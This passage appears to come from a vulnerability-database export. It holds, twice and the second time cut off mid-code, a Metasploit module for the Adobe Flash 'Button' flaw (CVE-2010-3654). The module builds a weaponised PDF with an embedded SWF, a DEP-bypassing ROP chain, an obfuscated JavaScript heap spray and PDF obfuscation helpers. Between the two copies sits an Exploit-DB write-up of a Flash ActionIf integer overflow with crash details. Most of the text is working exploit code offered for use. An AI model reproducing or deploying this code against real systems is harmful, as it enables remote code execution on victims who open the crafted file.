This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Found being openly exploited\r\n\t\t\t\t\t'Haifei Li', # PoC\r\n\t\t\t\t\t'jduck' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10857 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-3654'],\r\n\t\t\t\t\t['OSVDB', '68932'],\r\n\t\t\t\t\t['BID', '44504'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'],\r\n\t\t\t\t\t['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC\r\n\t\t\t\t\t# For SWF->PDF embedding\r\n\t\t\t\t\t['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash 10.1.85.3) -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 28 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tswf_data = make_swf()\r\n\t\tjs_data = make_js(payload.encoded)\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(swf_data, js_data)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef make_swf\r\n\t\t# load the static swf file\r\n\t\tpath = 
File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-3654.swf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\tswf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\t\tswf_data\r\n\tend\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call edx\r\n\t\t\t0xcccccccc,\r\n\t\t\t0xcccccccc,\r\n\t\t\t0xc0c0c0c + 0x10,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- 
(KiFastSystemCall - VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov 
[eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef 
ioDef(id)\r\n\t\t\"%d 0 obj\\n\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\r\n\r\n\t\txref = []\r\n\t\teol = \"\\n\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\t#pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog\")\r\n\t\tpdf << nObfu(\"/Pages \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/OpenAction \") << ioRef(5)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length 
%s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\")\r\n\t\tpdf << nObfu(\"/Rect [20 20 187 69] \")\r\n\t\tpdf << nObfu(\"/RichMediaSettings \") << ioRef(8)\r\n\t\tpdf << nObfu(\"/RichMediaContent \") << ioRef(9)\r\n\t\tpdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Activation \") << ioRef(10)\r\n\t\tpdf << nObfu(\"/Deactivation \") << ioRef(11)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media content\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaContent\")\r\n\t\tpdf << nObfu(\"/Assets \") << ioRef(12)\r\n\t\tpdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\"\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(12)\r\n\t\tpdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media 
configuration\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(15)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Asset \") << ioRef(13)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << swf << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << \"trailer\" << eol\r\n\t\tpdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << \"%%EOF\" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16667/"}, {"lastseen": "2016-02-01T21:48:11", "description": "Adobe Flash - ActionIf Integer Denial of Service Vulnerability. CVE-2010-3639. 
DoS exploit for Windows platform", "published": "2010-11-05T00:00:00", "type": "exploitdb", "title": "Adobe Flash - ActionIf Integer Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3639"], "modified": "2010-11-05T00:00:00", "id": "EDB-ID:15426", "href": "https://www.exploit-db.com/exploits/15426/", "sourceData": "Adobe Flash Integer Overflow \r\nAuthor: Matthew Bergin\r\nDate: June 15, 2010\r\nVersions Affected: Flash10e.ocx v10.0.45.2\r\n\t\t Flash10c.ocx v10.0.32.18 r32\r\nRoot Cause: ActionScript, \"ActionIf\"\r\nAffect: Denial-of-Service, possible Command Execution\r\nCVE: CVE-2010-3639\r\nDesc: When parsing an ActionIf ActionScript statement four args are passed\r\n to the function, an integer named i, a ubyte named ActionCode, a ushort\r\n named Length, and a short named BranchOffset. If the BranchOffset is -305 or \r\n smaller it will cause an Access Violation when reading data from an \r\n invalid memory address. The last 16 bits of the address are controllable\r\n with the size of the BranchOffset argument. Any data which is in a valid\r\n segment of memory near the controlled address can be read causing Memory\r\n Disclosure. This would be used well in combination with a memory corruption\r\n vulnerability in order to bypass ASLR. \r\n\r\n In doing my initial research I found a lot of interesting things along the way.\r\n Flash10c is not vulnerable in the same way Flash10e is. I initially discovered\r\n the integer overflow in Flash10c while fuzzing SWF. I didn't fuzz it via a web\r\n browser but instead used a free application which uses the modules in a more\r\n direct manner. Flash10c is not able to be attacked via a browser as far as I\r\n have been able to tell. However, I have found during my research that Flash10e\r\n is loaded as a module when any Flash object is encountered. I am unsure as to\r\n if this is a configuration issue or not. 
In addition to this, while debugging\r\n this issue I found that both versions have a self-changing CRC which inhibits\r\n keeping breakpoints set.\r\n\r\n Another interesting note is that when confirming the PoC on Flash Movie Player\r\n I noticed that if you open the file with the File -> Open drop-down menu, the\r\n PoC will not hit the vulnerable code causing a crash. However, if you register\r\n the swf extension to Flash Movie Player and \"double-click\" the PoC file to run\r\n it, Flash Movie Player will hit the vulnerable code every time. \r\n\r\n The PoC code would be best embedded into HTML for remote attacks but can be\r\n attacked in any manner in which Flash10c.ocx/Flash10e.ocx are loaded as modules\r\n into memory.\r\n\r\n\r\nFuzzed Application: EolSoft Flash Movie Player (downloads.cnet.com) v1.5\r\n\r\nCrash Details:\r\n\r\nAccess Violation\r\nException caught at 1009cb23 mov al,[eax+ecx]\r\nEAX:0267010c EBX:00e990b4 ECX:fffffef3 EDX:00e9b038\r\nESI:00e80000 EDI:00e990b0 ESP:0012f780 EBP:0012f99c\r\n\r\nReversing:\r\n\r\nstruct SWFTAG Tag[7], value DoAction\r\nstruct ACTIONRECORD ActionTag[6], value ActionIf, starts @ E3h size 5h\r\nint i, value 0\r\nubyte ActionCode, value 157\r\nushort Length, value 2\r\nshort BranchOffset, value -305\r\n\r\nBranchOffset is located @ E6h-E7h\r\n\r\nPoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar)\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15426/"}], "metasploit": [{"lastseen": "2020-06-27T20:14:55", "description": "This module exploits a vulnerability in the handling of certain SWF movies within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. 
Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due to a hardcoded syscall number.\n", "published": "2010-11-01T22:34:13", "type": "metasploit", "title": "Adobe Flash Player \"Button\" Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_FLASHPLAYER_BUTTON", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player \"Button\" Remote Code Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the handling of certain SWF movies\n within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n are also vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. 
This method is unlikely to work across various\n Windows versions due to a hardcoded syscall number.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Found being openly exploited\n 'Haifei Li', # PoC\n 'jduck' # Metasploit version\n ],\n 'References' =>\n [\n ['CVE', '2010-3654'],\n ['OSVDB', '68932'],\n ['BID', '44504'],\n ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'],\n ['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC\n # For SWF->PDF embedding\n ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash 10.1.85.3) -jjd\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Oct 28 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n swf_data = make_swf()\n js_data = make_js(payload.encoded)\n\n # Create the pdf\n pdf = make_pdf(swf_data, js_data)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\n\n def make_swf\n # load the static swf file\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2010-3654.swf\" )\n fd = File.open( path, \"rb\" )\n swf_data = fd.read(fd.stat.size)\n fd.close\n swf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using BIB.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0xc0c0c0c,\n 0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call 
edx\n 0xcccccccc,\n 0xcccccccc,\n 0xc0c0c0c + 0x10,\n 0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\n 0xcccccccc,\n 0x70048ef, # xchg eax,esp / ret\n 0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\n 0xcccccccc,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009033, # ret 0x18\n 0x7009084, # ret\n 0xc0c0c0c,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7001599, # pop ebp / ret\n 0x10124,\n 0x70072f7, # pop eax / ret\n 0x10104,\n 0x70015bb, # pop ecx / ret\n 0x1000,\n 0x700154d, # mov [eax], ecx / ret\n 0x70015bb, # pop ecx / ret\n 0x7ffe0300, # -- location of KiFastSystemCall\n 0x7007fb2, # mov eax, [ecx] / ret\n 0x70015bb, # pop ecx / ret\n 0x10011,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70015bb, # pop ecx / ret\n 0x10100,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70072f7, # pop eax / ret\n 0x10011,\n 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\n 0x7005c54, # pop esi / add esp,0x14 / ret\n 0xffffffff,\n 0x10100,\n 0x0,\n 0x10104,\n 0x1000,\n 0x40,\n # The next bit effectively copies data from the interleaved stack to the memory\n # pointed to by eax\n # The data copied is:\n # \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\n # \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\n # \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x70015bb, # pop ecx / ret\n 0x9054905a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5815eb5a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x18891a8b,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / 
ret\n 0x70015bb, # pop ecx / ret\n 0x8304c083,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xfb8104c2,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xc0c0c0c,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5ebee75,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xffffe6e8,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x909090ff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90ffffff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x700112f # call eax -- (execute stub to transition to full shellcode)\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = 